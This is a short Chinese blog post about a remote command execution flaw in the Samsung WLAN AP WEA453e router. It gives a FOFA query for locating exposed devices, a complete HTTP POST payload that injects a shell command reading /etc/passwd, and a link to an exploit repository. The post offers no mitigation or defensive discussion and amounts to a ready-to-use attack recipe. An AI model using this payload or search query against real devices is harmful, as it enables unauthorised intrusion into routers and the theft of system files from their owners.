Samsung WLAN AP RCE漏洞及利用工具

1、漏洞详情：

三星 WLAN AP WEA453e 路由器远程命令执行

2、fofa语句

title=="Samsung WLAN AP"

3、复现

payload：

POST /(download)/tmp/a.txt HTTP/1.1Host: xxx.xxx.xxx.xxxConnection: closeContent-Length: 48

command1=shell:cat /etc/passwd| dd of=/tmp/a.txt

4、exp

https://github.com/msfisgood/Samsung-WLAN_RCE

posted @ 2021-04-16 04:05 忆水、阅读(732) 评论(0) 收藏举报

刷新页面返回顶部